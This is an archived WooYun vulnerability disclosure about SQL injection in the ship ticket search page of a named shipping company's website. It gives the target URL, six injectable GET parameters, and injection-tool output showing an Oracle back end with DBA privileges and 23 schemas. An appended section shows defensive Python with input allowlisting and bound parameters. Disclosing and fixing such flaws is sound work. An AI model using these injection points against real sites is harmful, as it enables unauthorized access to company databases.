WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-11-03: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-12-18: The vendor has actively ignored the vulnerability; details disclosed to the public
As the title says.
In the ticket search area:
http://ejj.jjshipping.cn/eservices/shipsearch.jsp?startcon=CN&startPort=CNDLC&beginDate=2015-07-01&endDate=2015-07-31&endcon=CN&endPort=CNDLC
Scary: that many parameters, and every one of them is injectable.
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: startcon, type: Single quoted string (default)
[1] place: GET, parameter: startPort, type: Single quoted string
[2] place: GET, parameter: beginDate, type: Single quoted string
[3] place: GET, parameter: endDate, type: Single quoted string
[4] place: GET, parameter: endcon, type: Single quoted string
[5] place: GET, parameter: endPort, type: Single quoted string
[q] Quit
>
[14:57:23] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:57:23] [INFO] fetching current user
current user: 'LSP_SHJJHY'
DBA privileges:
[15:01:20] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:01:20] [INFO] testing if current user is DBA
current user is DBA: 'True'
available databases [23]
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] JJOA
[*] JJWEB
[*] LSP_SHJJHY
[*] MDSYS
[*] NC57
[*] NC57TEST
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SAMIS45QD
[*] SAMIS_JC
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB
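A defensive counterpart to the report above, added here and not part of the original post: allowlist validation of the six shipsearch.jsp parameters followed by a query that binds them as placeholders instead of quoting them into the SQL text. Python with an in-memory SQLite table standing in for the site's Oracle schema; the table, its columns and rows, and the assumed value shapes (ISO 3166 country code, five-character UN/LOCODE, ISO date) are all constructed for this example.

```python
import re
import sqlite3

# Allowlist shapes for the six GET parameters of shipsearch.jsp (assumed: ISO 3166
# country code, five-character UN/LOCODE, ISO date). Non-matching input never reaches SQL.
COUNTRY, PORT, DATE = r"[A-Z]{2}", r"[A-Z0-9]{5}", r"\d{4}-\d{2}-\d{2}"
PARAM_RULES = {"startcon": COUNTRY, "startPort": PORT, "beginDate": DATE,
               "endDate": DATE, "endcon": COUNTRY, "endPort": PORT}

def validate(params):
    """Return the validated parameters or raise ValueError; every parameter is required."""
    clean = {}
    for name, rule in PARAM_RULES.items():
        value = params.get(name, "")
        if not re.fullmatch(rule, value):
            raise ValueError(f"rejected value for parameter {name}")
        clean[name] = value
    return clean

def is_accepted(params):
    """True if the request would be handed to the database, False if it is rejected."""
    try:
        validate(params)
    except ValueError:
        return False
    return True

def search_sailings(conn, params):
    """Run the search with bound parameters only; the SQL text never contains user input."""
    clean = validate(params)
    sql = ("SELECT id, vessel FROM sailings WHERE start_country = ? AND start_port = ? "
           "AND end_country = ? AND end_port = ? AND sail_date BETWEEN ? AND ? ORDER BY id")
    args = (clean["startcon"], clean["startPort"], clean["endcon"], clean["endPort"],
            clean["beginDate"], clean["endDate"])
    return conn.execute(sql, args).fetchall()

def demo_db():
    """Constructed in-memory table standing in for the site's Oracle schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sailings(id INTEGER, vessel TEXT, start_country TEXT, "
                 "start_port TEXT, end_country TEXT, end_port TEXT, sail_date TEXT)")
    conn.executemany("INSERT INTO sailings VALUES (?, ?, ?, ?, ?, ?, ?)", [
        (1, "CONSTRUCTED-A", "CN", "CNDLC", "CN", "CNDLC", "2015-07-05"),
        (2, "CONSTRUCTED-B", "CN", "CNDLC", "CN", "CNDLC", "2015-08-02"),
        (3, "CONSTRUCTED-C", "CN", "CNSHA", "CN", "CNDLC", "2015-07-10"),
    ])
    return conn
```

The same `?` placeholders are what a JDBC PreparedStatement uses against Oracle, so the query shape carries over to the JSP side unchanged.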
Unable to reach the vendor, or the vendor actively declined